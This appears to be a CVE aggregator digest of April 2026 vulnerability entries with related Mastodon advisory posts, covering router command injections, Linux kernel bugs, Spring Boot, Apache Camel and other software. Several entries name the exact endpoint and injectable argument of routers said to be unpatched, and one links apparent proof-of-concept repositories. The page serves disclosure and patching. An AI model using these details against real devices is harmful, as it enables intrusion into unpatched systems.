A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setUrlFilterRules of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument enable results in os comma...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7204
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-28T03:31:36

3 posts

A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. This issue affects the function setPptpServerCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument enable causes os command injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized.

offseq@infosec.exchange at 2026-04-28T02:00:30.000Z ##

🚨 CRITICAL: Totolink A8000RU (7.1cu.643_b20200521) affected by CVE-2026-7204 — remote OS command injection in CGI handler. No patch yet. Restrict access & monitor for updates. Public exploit disclosed. radar.offseq.com/threat/cve-20 #OffSeq #Vulnerability #IoTSecurity #CVE20267204

##

thehackerwire@mastodon.social at 2026-04-28T01:44:02.000Z ##

🔴 CVE-2026-7204 - Critical (9.8)

A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. This issue affects the function setPptpServerCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument enable causes os command inje...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-04-28T01:30:29.000Z ##

🚨 CRITICAL: Totolink A8000RU routers (7.1cu.643_b20200521) vulnerable to remote, unauthenticated OS command injection (CVE-2026-7204). No patch yet. Restrict access & monitor vendor channels. radar.offseq.com/threat/cve-20 #OffSeq #Vuln #RouterSecurity #CVE20267204

##

CVE-2026-41371
(8.5 HIGH)

EPSS: 0.04%

updated 2026-04-28T00:31:48

1 posts

OpenClaw before 2026.3.28 contains a privilege escalation vulnerability in chat.send that allows write-scoped gateway callers to trigger admin-only session reset operations. Attackers can rotate target sessions, archive prior transcript state, and force new session IDs without requiring admin scope by exploiting improper authorization checks in the chat.send path.

thehackerwire@mastodon.social at 2026-04-28T00:18:44.000Z ##

🟠 CVE-2026-41371 - High (8.5)

OpenClaw before 2026.3.28 contains a privilege escalation vulnerability in chat.send that allows write-scoped gateway callers to trigger admin-only session reset operations. Attackers can rotate target sessions, archive prior transcript state, and...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40976
(9.1 CRITICAL)

EPSS: 0.04%

updated 2026-04-28T00:31:47

4 posts

In certain circumstances, Spring Boot's default web security is ineffective allowing unauthorized access to all endpoints. For an application to be vulnerable, it must: be a servlet-based web application; have no Spring Security configuration of its own and rely on the default web security filter chain; depend on spring-boot-actuator-autoconfigure; not depend on spring-boot-health. If any of the a

Matchbook3469@mastodon.social at 2026-04-29T17:44:37.000Z ##

🚨 New security advisory:

CVE-2026-40976 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
yazoul.net/advisory/cve/cve-20

#CVE #SecurityPatching #HackerNews

##

beyondmachines1 at 2026-04-29T09:01:29.511Z ##

Spring Boot Security Update Patches Critical Authentication Bypass and RCE Flaws

Spring Boot reports three vulnerabilities, including a critical authentication bypass (CVE-2026-40976) and flaws allowing session hijacking or remote code execution via timing attacks.

**If you use Spring Boot, upgrade ASAP to a patched version (4.0.6, 3.5.14, 3.4.16, 3.3.19, or 2.7.33). Until patched, restrict access to your applications from trusted networks only and disable DevTools and Actuator endpoints in production.**

beyondmachines.net/event_detai

##

beyondmachines1@infosec.exchange at 2026-04-29T09:01:29.000Z ##

Spring Boot Security Update Patches Critical Authentication Bypass and RCE Flaws

Spring Boot reports three vulnerabilities, including a critical authentication bypass (CVE-2026-40976) and flaws allowing session hijacking or remote code execution via timing attacks.

**If you use Spring Boot, upgrade ASAP to a patched version (4.0.6, 3.5.14, 3.4.16, 3.3.19, or 2.7.33). Until patched, restrict access to your applications from trusted networks only and disable DevTools and Actuator endpoints in production.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

thehackerwire@mastodon.social at 2026-04-28T01:00:52.000Z ##

🔴 CVE-2026-40976 - Critical (9.1)

In certain circumstances, Spring Boot's default web security is ineffective allowing unauthorized access to all endpoints. For an application to be vulnerable, it must: be a servlet-based web application; have no Spring Security configuration of i...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-27785
(8.8 HIGH)

EPSS: 0.01%

updated 2026-04-28T00:31:47

1 posts

Specific firmware versions of Milesight AIOT camera firmware contain hard-coded credentials.

thehackerwire@mastodon.social at 2026-04-28T01:01:01.000Z ##

🟠 CVE-2026-27785 - High (8.8)

Specific firmware versions of Milesight AIOT camera firmware contain hard-coded credentials.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41364
(8.1 HIGH)

EPSS: 0.15%

updated 2026-04-28T00:31:47

1 posts

OpenClaw before 2026.3.31 contains a symlink following vulnerability in SSH sandbox tar upload that allows remote attackers to write arbitrary files. Attackers can exploit this by uploading tar archives containing symlinks to escape the sandbox and overwrite files on the remote host.

thehackerwire@mastodon.social at 2026-04-28T00:59:55.000Z ##

🟠 CVE-2026-41364 - High (8.1)

OpenClaw before 2026.3.31 contains a symlink following vulnerability in SSH sandbox tar upload that allows remote attackers to write arbitrary files. Attackers can exploit this by uploading tar archives containing symlinks to escape the sandbox an...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7160
(8.8 HIGH)

EPSS: 0.29%

updated 2026-04-28T00:31:47

1 posts

A vulnerability was determined in Tenda HG3 2.0. This vulnerability affects the function formTracert of the file /boaform/formTracert. Executing a manipulation of the argument datasize can lead to command injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized.

thehackerwire@mastodon.social at 2026-04-27T22:37:48.000Z ##

🟠 CVE-2026-7160 - High (8.8)

A vulnerability was determined in Tenda HG3 2.0. This vulnerability affects the function formTracert of the file /boaform/formTracert. Executing a manipulation of the argument datasize can lead to command injection. The attack may be performed fro...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31652
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T21:31:56

1 posts

In the Linux kernel, the following vulnerability has been resolved: mm/damon/stat: deallocate damon_call() failure leaking damon_ctx damon_stat_start() always allocates the module's damon_ctx object (damon_stat_context). Meanwhile, if damon_call() in the function fails, the damon_ctx object is not deallocated. Hence, if the damon_call() is failed, and the user writes Y to “enabled” again, the

thehackerwire@mastodon.social at 2026-04-28T03:07:56.000Z ##

🟠 CVE-2026-31652 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

mm/damon/stat: deallocate damon_call() failure leaking damon_ctx

damon_stat_start() always allocates the module's damon_ctx object
(damon_stat_context). Meanwhile, if damon_cal...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31649
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-04-27T21:31:56

1 posts

In the Linux kernel, the following vulnerability has been resolved: net: stmmac: fix integer underflow in chain mode The jumbo_frm() chain-mode implementation unconditionally computes len = nopaged_len - bmax; where nopaged_len = skb_headlen(skb) (linear bytes only) and bmax is BUF_SIZE_8KiB or BUF_SIZE_2KiB. However, the caller stmmac_xmit() decides to invoke jumbo_frm() based on skb->le

thehackerwire@mastodon.social at 2026-04-28T03:00:11.000Z ##

🔴 CVE-2026-31649 - Critical (9.8)

In the Linux kernel, the following vulnerability has been resolved:

net: stmmac: fix integer underflow in chain mode

The jumbo_frm() chain-mode implementation unconditionally computes

len = nopaged_len - bmax;

where nopaged_len = skb_headl...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7155
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-27T21:31:12

1 posts

A security vulnerability has been detected in Totolink A8000RU 7.1cu.643_b20200521. This impacts the function setLoginPasswordCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument admpass leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used.

offseq@infosec.exchange at 2026-04-28T00:00:43.000Z ##

💥 CVE-2026-7155: CRITICAL OS command injection in Totolink A8000RU (7.1cu.643_b20200521). Exploitable remotely, no auth needed. Disable remote mgmt & restrict access until patch. Details: radar.offseq.com/threat/cve-20 #OffSeq #Vulnerability #CVE2026_7155 #IoTSecurity

##

CVE-2026-7156
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-27T21:31:12

1 posts

A vulnerability was detected in Totolink A8000RU 7.1cu.643_b20200521. Affected is the function CsteSystem of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument HTTP results in os command injection. The attack may be launched remotely. The exploit is now public and may be used.

offseq@infosec.exchange at 2026-04-27T23:00:33.000Z ##

🚨 CRITICAL: Totolink A8000RU (7.1cu.643_b20200521) is vulnerable to OS command injection (CVE-2026-7156, CVSS 9.3). Exploit is public — remote attackers can fully compromise devices. Disable remote mgmt & restrict access now. radar.offseq.com/threat/cve-20 #OffSeq #CVE20267156 #IoTSecurity

##

CVE-2026-30350
(7.5 HIGH)

EPSS: 0.01%

updated 2026-04-27T21:31:02

1 posts

An issue in the /store/items/search endpoint of Agent Protocol server commit e9a89f allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

thehackerwire@mastodon.social at 2026-04-27T22:01:02.000Z ##

🟠 CVE-2026-30350 - High (7.5)

An issue in the /store/items/search endpoint of Agent Protocol server commit e9a89f allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31669
(9.8 CRITICAL)

EPSS: 0.07%

updated 2026-04-27T21:30:51

1 posts

In the Linux kernel, the following vulnerability has been resolved: mptcp: fix slab-use-after-free in __inet_lookup_established The ehash table lookups are lockless and rely on SLAB_TYPESAFE_BY_RCU to guarantee socket memory stability during RCU read-side critical sections. Both tcp_prot and tcpv6_prot have their slab caches created with this flag via proto_register(). However, MPTCP's mptcp_su

thehackerwire@mastodon.social at 2026-04-28T01:11:18.000Z ##

🔴 CVE-2026-31669 - Critical (9.8)

In the Linux kernel, the following vulnerability has been resolved:

mptcp: fix slab-use-after-free in __inet_lookup_established

The ehash table lookups are lockless and rely on
SLAB_TYPESAFE_BY_RCU to guarantee socket memory stability
during RCU...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31667
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T21:30:51

1 posts

In the Linux kernel, the following vulnerability has been resolved: Input: uinput - fix circular locking dependency with ff-core A lockdep circular locking dependency warning can be triggered reproducibly when using a force-feedback gamepad with uinput (for example, playing ELDEN RING under Wine with a Flydigi Vader 5 controller): ff->mutex -> udev->mutex -> input_mutex -> dev->mutex -> ff->m

thehackerwire@mastodon.social at 2026-04-28T00:15:26.000Z ##

🟠 CVE-2026-31667 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

Input: uinput - fix circular locking dependency with ff-core

A lockdep circular locking dependency warning can be triggered
reproducibly when using a force-feedback gamepad with...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31665
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T21:30:51

1 posts

In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_ct: fix use-after-free in timeout object destroy nft_ct_timeout_obj_destroy() frees the timeout object with kfree() immediately after nf_ct_untimeout(), without waiting for an RCU grace period. Concurrent packet processing on other CPUs may still hold RCU-protected references to the timeout object obtained via rcu

thehackerwire@mastodon.social at 2026-04-28T00:15:04.000Z ##

🟠 CVE-2026-31665 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

netfilter: nft_ct: fix use-after-free in timeout object destroy

nft_ct_timeout_obj_destroy() frees the timeout object with kfree()
immediately after nf_ct_untimeout(), without w...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31662
(7.5 HIGH)

EPSS: 0.05%

updated 2026-04-27T21:30:50

1 posts

In the Linux kernel, the following vulnerability has been resolved: tipc: fix bc_ackers underflow on duplicate GRP_ACK_MSG The GRP_ACK_MSG handler in tipc_group_proto_rcv() currently decrements bc_ackers on every inbound group ACK, even when the same member has already acknowledged the current broadcast round. Because bc_ackers is a u16, a duplicate ACK received after the last legitimate ACK wr

thehackerwire@mastodon.social at 2026-04-28T02:22:57.000Z ##

🟠 CVE-2026-31662 - High (7.5)

In the Linux kernel, the following vulnerability has been resolved:

tipc: fix bc_ackers underflow on duplicate GRP_ACK_MSG

The GRP_ACK_MSG handler in tipc_group_proto_rcv() currently decrements
bc_ackers on every inbound group ACK, even when the...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31657
(9.8 CRITICAL)

EPSS: 0.06%

updated 2026-04-27T21:30:50

1 posts

In the Linux kernel, the following vulnerability has been resolved: batman-adv: hold claim backbone gateways by reference batadv_bla_add_claim() can replace claim->backbone_gw and drop the old gateway's last reference while readers still follow the pointer. The netlink claim dump path dereferences claim->backbone_gw->orig and takes claim->backbone_gw->crc_lock without pinning the underlying bac

thehackerwire@mastodon.social at 2026-04-28T01:11:39.000Z ##

🔴 CVE-2026-31657 - Critical (9.8)

In the Linux kernel, the following vulnerability has been resolved:

batman-adv: hold claim backbone gateways by reference

batadv_bla_add_claim() can replace claim->backbone_gw and drop the old
gateway's last reference while readers still follow ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31648
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T21:30:49

1 posts

In the Linux kernel, the following vulnerability has been resolved: mm: filemap: fix nr_pages calculation overflow in filemap_map_pages() When running stress-ng on my Arm64 machine with v7.0-rc3 kernel, I encountered some very strange crash issues showing up as "Bad page state": " [ 734.496287] BUG: Bad page state in process stress-ng-env pfn:415735fb [ 734.496427] page: refcount:0 mapcount:

thehackerwire@mastodon.social at 2026-04-28T03:00:01.000Z ##

🟠 CVE-2026-31648 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

mm: filemap: fix nr_pages calculation overflow in filemap_map_pages()

When running stress-ng on my Arm64 machine with v7.0-rc3 kernel, I
encountered some very strange crash issu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31656
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T20:16:43.370000

1 posts

In the Linux kernel, the following vulnerability has been resolved: drm/i915/gt: fix refcount underflow in intel_engine_park_heartbeat A use-after-free / refcount underflow is possible when the heartbeat worker and intel_engine_park_heartbeat() race to release the same engine->heartbeat.systole request. The heartbeat worker reads engine->heartbeat.systole and calls i915_request_put() on it when

thehackerwire@mastodon.social at 2026-04-28T01:11:29.000Z ##

🟠 CVE-2026-31656 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

drm/i915/gt: fix refcount underflow in intel_engine_park_heartbeat

A use-after-free / refcount underflow is possible when the heartbeat
worker and intel_engine_park_heartbeat() ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31650
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T20:14:35.180000

1 posts

In the Linux kernel, the following vulnerability has been resolved: mmc: vub300: fix use-after-free on disconnect The vub300 driver maintains an explicit reference count for the controller and its driver data and the last reference can in theory be dropped after the driver has been unbound. This specifically means that the controller allocation must not be device managed as that can lead to use

thehackerwire@mastodon.social at 2026-04-28T03:00:21.000Z ##

🟠 CVE-2026-31650 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

mmc: vub300: fix use-after-free on disconnect

The vub300 driver maintains an explicit reference count for the
controller and its driver data and the last reference can in theory...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31666
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T20:00:27.157000

1 posts

In the Linux kernel, the following vulnerability has been resolved: btrfs: fix incorrect return value after changing leaf in lookup_extent_data_ref() After commit 1618aa3c2e01 ("btrfs: simplify return variables in lookup_extent_data_ref()"), the err and ret variables were merged into a single ret variable. However, when btrfs_next_leaf() returns 0 (success), ret is overwritten from -ENOENT to 0.

thehackerwire@mastodon.social at 2026-04-28T00:15:16.000Z ##

🟠 CVE-2026-31666 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

btrfs: fix incorrect return value after changing leaf in lookup_extent_data_ref()

After commit 1618aa3c2e01 ("btrfs: simplify return variables in
lookup_extent_data_ref()"), the...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31663
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T19:59:32.810000

1 posts

In the Linux kernel, the following vulnerability has been resolved: xfrm: hold dev ref until after transport_finish NF_HOOK After async crypto completes, xfrm_input_resume() calls dev_put() immediately on re-entry before the skb reaches transport_finish. The skb->dev pointer is then used inside NF_HOOK and its okfn, which can race with device teardown. Remove the dev_put from the async resumpti

thehackerwire@mastodon.social at 2026-04-28T02:23:06.000Z ##

🟠 CVE-2026-31663 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

xfrm: hold dev ref until after transport_finish NF_HOOK

After async crypto completes, xfrm_input_resume() calls dev_put()
immediately on re-entry before the skb reaches transpor...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42039
(7.5 HIGH)

EPSS: 0.04%

updated 2026-04-27T19:50:46.320000

1 posts

Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, toFormData recursively walks nested objects with no depth limit, so a deeply nested value passed as request data crashes the Node.js process with a RangeError. This vulnerability is fixed in 1.15.1 and 0.31.1.

thehackerwire@mastodon.social at 2026-04-27T23:06:11.000Z ##

🟠 CVE-2026-42039 - High (7.5)

Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, toFormData recursively walks nested objects with no depth limit, so a deeply nested value passed as request data crashes the Node.js process with a Range...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-3008
(6.6 MEDIUM)

EPSS: 0.01%

updated 2026-04-27T18:57:20.293000

1 posts

Successful exploitation of the string injection vulnerability could allow an attacker to obtain memory address information or crash the application.

3 repos

https://github.com/rakeshelamaran98/CVE-2026-30081

https://github.com/Cr0wld3r/CVE-2026-30082

https://github.com/llgsjsm/cve-2026-3008

beyondmachines1@infosec.exchange at 2026-04-28T13:01:28.000Z ##

Notepad++ Patches Critical Format String Injection Flaw

Notepad++ version 8.9.4 patches a critical format string injection vulnerability (CVE-2026-3008) that allow attackers to crash the application or leak sensitive memory data via malicious language packs.

**If you use Notepad++, update to version 8.9.4 immediately through the official website or built-in updater, especially if you use a non-English language pack. Only download language packs from the official Notepad++ source, never from forums or third-party sites.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2026-31680
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T18:32:22.917000

1 posts

In the Linux kernel, the following vulnerability has been resolved: net: ipv6: flowlabel: defer exclusive option free until RCU teardown `ip6fl_seq_show()` walks the global flowlabel hash under the seq-file RCU read-side lock and prints `fl->opt->opt_nflen` when an option block is present. Exclusive flowlabels currently free `fl->opt` as soon as `fl->users` drops to zero in `fl_release()`. Howe

thehackerwire@mastodon.social at 2026-04-27T23:00:41.000Z ##

🟠 CVE-2026-31680 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

net: ipv6: flowlabel: defer exclusive option free until RCU teardown

`ip6fl_seq_show()` walks the global flowlabel hash under the seq-file
RCU read-side lock and prints `fl->opt...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31676
(7.5 HIGH)

EPSS: 0.04%

updated 2026-04-27T18:32:22.917000

1 posts

In the Linux kernel, the following vulnerability has been resolved: rxrpc: only handle RESPONSE during service challenge Only process RESPONSE packets while the service connection is still in RXRPC_CONN_SERVICE_CHALLENGING. Check that state under state_lock before running response verification and security initialization, then use a local secured flag to decide whether to queue the secured-conne

thehackerwire@mastodon.social at 2026-04-27T23:00:16.000Z ##

🟠 CVE-2026-31676 - High (7.5)

In the Linux kernel, the following vulnerability has been resolved:

rxrpc: only handle RESPONSE during service challenge

Only process RESPONSE packets while the service connection is still in
RXRPC_CONN_SERVICE_CHALLENGING. Check that state unde...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31683
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T18:32:22.917000

1 posts

In the Linux kernel, the following vulnerability has been resolved: batman-adv: avoid OGM aggregation when skb tailroom is insufficient When OGM aggregation state is toggled at runtime, an existing forwarded packet may have been allocated with only packet_len bytes, while a later packet can still be selected for aggregation. Appending in this case can hit skb_put overflow conditions. Reject agg

thehackerwire@mastodon.social at 2026-04-27T22:03:20.000Z ##

🟠 CVE-2026-31683 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

batman-adv: avoid OGM aggregation when skb tailroom is insufficient

When OGM aggregation state is toggled at runtime, an existing forwarded
packet may have been allocated with o...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33454
(9.4 CRITICAL)

EPSS: 0.16%

updated 2026-04-27T18:32:06

1 posts

The Camel-Mail component is vulnerable to Camel message header injection. The custom header filter strategy used by the component (MailHeaderFilterStrategy) only filters the 'out' direction via setOutFilterStartsWith, while it does not configure the 'in' direction via setInFilterStartsWith. As a result, when a Camel application consumes mail through camel-mail (for example via from(\"imap://...\")

Matchbook3469@mastodon.social at 2026-04-29T16:15:06.000Z ##

🔴 New security advisory:

CVE-2026-33454 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
yazoul.net/advisory/cve/cve-20

#InfoSec #VulnerabilityManagement #CyberSec

##

CVE-2026-41635
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-04-27T18:32:05

1 posts

Apache MINA's AbstractIoBuffer.resolveClass() contains two branches, one of them (for static classes or primitive types) does not check the class at all, bypassing the classname allowlist and allowing arbitrary code to be executed. The fix checks if the class is present in the accepted class filter before calling Class.forName().  Affected versions are Apache MINA 2.0.0 <= 2.0.27, 2.1.0

thehackerwire@mastodon.social at 2026-04-27T22:01:21.000Z ##

🔴 CVE-2026-41635 - Critical (9.8)

Apache MINA's AbstractIoBuffer.resolveClass() contains two branches, one of them (for static classes or primitive types) does not check the class at all, bypassing the classname allowlist and allowing arbitrary code to be executed.

The fix che...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40860
(9.8 CRITICAL)

EPSS: 0.50%

updated 2026-04-27T18:32:05

1 posts

JmsBinding.extractBodyFromJms() in camel-jms, and the equivalent JmsBinding class in camel-sjms, deserialized the payload of incoming JMS ObjectMessage values via javax.jms.ObjectMessage.getObject() without applying any ObjectInputFilter, class allowlist or class denylist. Because this code path is reached whenever the mapJmsMessage option is enabled (the default) and Camel acts as a JMS consumer,

thehackerwire@mastodon.social at 2026-04-27T22:01:11.000Z ##

🔴 CVE-2026-40860 - Critical (9.8)

JmsBinding.extractBodyFromJms() in camel-jms, and the equivalent JmsBinding class in camel-sjms, deserialized the payload of incoming JMS ObjectMessage values via javax.jms.ObjectMessage.getObject() without applying any ObjectInputFilter, class al...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31682
(9.1 CRITICAL)

EPSS: 0.07%

updated 2026-04-27T15:31:59

1 posts

In the Linux kernel, the following vulnerability has been resolved: bridge: br_nd_send: linearize skb before parsing ND options br_nd_send() parses neighbour discovery options from ns->opt[] and assumes that these options are in the linear part of request. Its callers only guarantee that the ICMPv6 header and target address are available, so the option area can still be non-linear. Parsing ns->

thehackerwire@mastodon.social at 2026-04-27T23:05:51.000Z ##

🔴 CVE-2026-31682 - Critical (9.1)

In the Linux kernel, the following vulnerability has been resolved:

bridge: br_nd_send: linearize skb before parsing ND options

br_nd_send() parses neighbour discovery options from ns->opt[] and
assumes that these options are in the linear part ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31685
(9.4 CRITICAL)

EPSS: 0.05%

updated 2026-04-27T15:31:59

1 posts

In the Linux kernel, the following vulnerability has been resolved: netfilter: ip6t_eui64: reject invalid MAC header for all packets `eui64_mt6()` derives a modified EUI-64 from the Ethernet source address and compares it with the low 64 bits of the IPv6 source address. The existing guard only rejects an invalid MAC header when `par->fragoff != 0`. For packets with `par->fragoff == 0`, `eui64_m

thehackerwire@mastodon.social at 2026-04-27T22:03:30.000Z ##

🔴 CVE-2026-31685 - Critical (9.4)

In the Linux kernel, the following vulnerability has been resolved:

netfilter: ip6t_eui64: reject invalid MAC header for all packets

`eui64_mt6()` derives a modified EUI-64 from the Ethernet source address
and compares it with the low 64 bits of...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31659
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-04-27T15:31:56

1 posts

In the Linux kernel, the following vulnerability has been resolved: batman-adv: reject oversized global TT response buffers batadv_tt_prepare_tvlv_global_data() builds the allocation length for a global TT response in 16-bit temporaries. When a remote originator advertises a large enough global TT, the TT payload length plus the VLAN header offset can exceed 65535 and wrap before kmalloc(). The

thehackerwire@mastodon.social at 2026-04-28T02:22:48.000Z ##

🔴 CVE-2026-31659 - Critical (9.8)

In the Linux kernel, the following vulnerability has been resolved:

batman-adv: reject oversized global TT response buffers

batadv_tt_prepare_tvlv_global_data() builds the allocation length for a
global TT response in 16-bit temporaries. When a ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31678
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T15:30:51

1 posts

In the Linux kernel, the following vulnerability has been resolved: openvswitch: defer tunnel netdev_put to RCU release ovs_netdev_tunnel_destroy() may run after NETDEV_UNREGISTER already detached the device. Dropping the netdev reference in destroy can race with concurrent readers that still observe vport->dev. Do not release vport->dev in ovs_netdev_tunnel_destroy(). Instead, let vport_netdev

thehackerwire@mastodon.social at 2026-04-27T23:00:27.000Z ##

🟠 CVE-2026-31678 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

openvswitch: defer tunnel netdev_put to RCU release

ovs_netdev_tunnel_destroy() may run after NETDEV_UNREGISTER already
detached the device. Dropping the netdev reference in des...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31675
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T15:30:51

1 posts

In the Linux kernel, the following vulnerability has been resolved: net/sched: sch_netem: fix out-of-bounds access in packet corruption In netem_enqueue(), the packet corruption logic uses get_random_u32_below(skb_headlen(skb)) to select an index for modifying skb->data. When an AF_PACKET TX_RING sends fully non-linear packets over an IPIP tunnel, skb_headlen(skb) evaluates to 0. Passing 0 to g

thehackerwire@mastodon.social at 2026-04-27T22:03:40.000Z ##

🟠 CVE-2026-31675 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

net/sched: sch_netem: fix out-of-bounds access in packet corruption

In netem_enqueue(), the packet corruption logic uses
get_random_u32_below(skb_headlen(skb)) to select an inde...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31673
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T15:30:50

1 posts

In the Linux kernel, the following vulnerability has been resolved: af_unix: read UNIX_DIAG_VFS data under unix_state_lock Exact UNIX diag lookups hold a reference to the socket, but not to u->path. Meanwhile, unix_release_sock() clears u->path under unix_state_lock() and drops the path reference after unlocking. Read the inode and device numbers for UNIX_DIAG_VFS while holding unix_state_lock(

thehackerwire@mastodon.social at 2026-04-27T23:06:00.000Z ##

🟠 CVE-2026-31673 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

af_unix: read UNIX_DIAG_VFS data under unix_state_lock

Exact UNIX diag lookups hold a reference to the socket, but not to
u->path. Meanwhile, unix_release_sock() clears u->path ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31668
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-04-27T15:30:47

1 posts

